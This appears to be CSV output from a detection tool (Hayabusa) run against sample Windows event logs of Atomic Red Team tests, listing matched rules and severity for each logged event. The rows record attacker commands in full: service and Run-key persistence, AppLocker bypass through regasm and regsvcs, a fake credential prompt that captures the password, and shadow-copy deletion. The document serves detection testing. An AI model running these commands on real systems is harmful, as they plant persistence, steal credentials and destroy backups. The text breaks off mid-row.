/c ""sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:08.185 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : Command: sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:08.185 +09:00,MSEDGEWIN10,1,low,New Service Creation,,rules/sigma/process_creation/win_new_service_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:08.268 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe start AtomicTestService"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:08.288 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : Command: sc.exe start AtomicTestService : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe start 
AtomicTestService""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:08.307 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe : Path: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:09.150 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe stop AtomicTestService"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:09.176 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : Command: sc.exe stop AtomicTestService : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe stop AtomicTestService""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:09.176 +09:00,MSEDGEWIN10,1,low,Stop Windows Service,,rules/sigma/process_creation/win_service_stop.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:09.253 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe delete AtomicTestService"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:09.278 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : Command: sc.exe delete AtomicTestService : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe delete AtomicTestService""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:09.351 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:32.101 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe : Path: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.219 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.219 
+09:00,MSEDGEWIN10,1,medium,Reg Add RUN Key,,rules/sigma/process_creation/win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,medium,Direct Autorun Keys Modification,,rules/sigma/process_creation/win_susp_direct_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,medium,Reg Add RUN Key,,rules/sigma/process_creation/win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.292 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.330 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.349 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.371 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.402 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.075 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "" C:\Path\AtomicRedTeam.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.075 +09:00,MSEDGEWIN10,1,medium,Reg Add RUN 
Key,,rules/sigma/process_creation/win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d C:\Path\AtomicRedTeam.dll : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "" C:\Path\AtomicRedTeam.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,medium,Direct Autorun Keys Modification,,rules/sigma/process_creation/win_susp_direct_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,medium,Reg Add RUN Key,,rules/sigma/process_creation/win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.161 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.196 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 
23:45:06.213 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.240 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.267 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:19.483 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:24.234 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:31.287 +09:00,MSEDGEWIN10,11,low,Startup Folder File Write,,rules/sigma/file_event/sysmon_startup_folder_file_write.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 
23:45:31.287 +09:00,MSEDGEWIN10,11,high,PowerShell Writing Startup Shortcuts,,rules/sigma/file_event/sysmon_powershell_startup_shortcuts.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:55.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:55.105 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:55.621 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Users\IEUser\AppData\Local\Temp\RESBED6.tmp"" ""c:\AtomicRedTeam\CSC5779B24A646D409A951966A058ABC4E3.TMP"" : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library 
C:\AtomicRedTeam\atomics\T1121\src\T1121.cs",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:55.681 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:55.681 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:55.699 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:55.699 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:56.033 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""del T1121.dll"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:56.069 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:19.052 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:19.443 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Users\IEUser\AppData\Local\Temp\RES1BEA.tmp"" ""c:\AtomicRedTeam\CSC8EBD65DB33242A1BAD76494F485AF42.TMP"" : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:19.484 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"" T1121.dll : Path: 
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:19.484 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:51.883 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:51.957 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;} : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 
23:46:51.957 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:21.972 +09:00,MSEDGEWIN10,13,medium,CurrentControlSet Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentcontrolset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:37.096 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:37.127 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:37.147 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:37.147 +09:00,MSEDGEWIN10,13,medium,New DLL Added to AppInit_DLLs Registry Key,,rules/sigma/registry_event/sysmon_new_dll_added_to_appinit_dlls_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 
+2019-07-19 23:47:37.168 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:37.215 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:40.691 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe delete shadows /all /quiet"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:40.706 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: vssadmin.exe delete shadows /all /quiet : Path: C:\Windows\System32\vssadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe delete shadows /all /quiet""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:40.706 +09:00,MSEDGEWIN10,1,critical,Shadow Copies Deletion Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:40.863 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
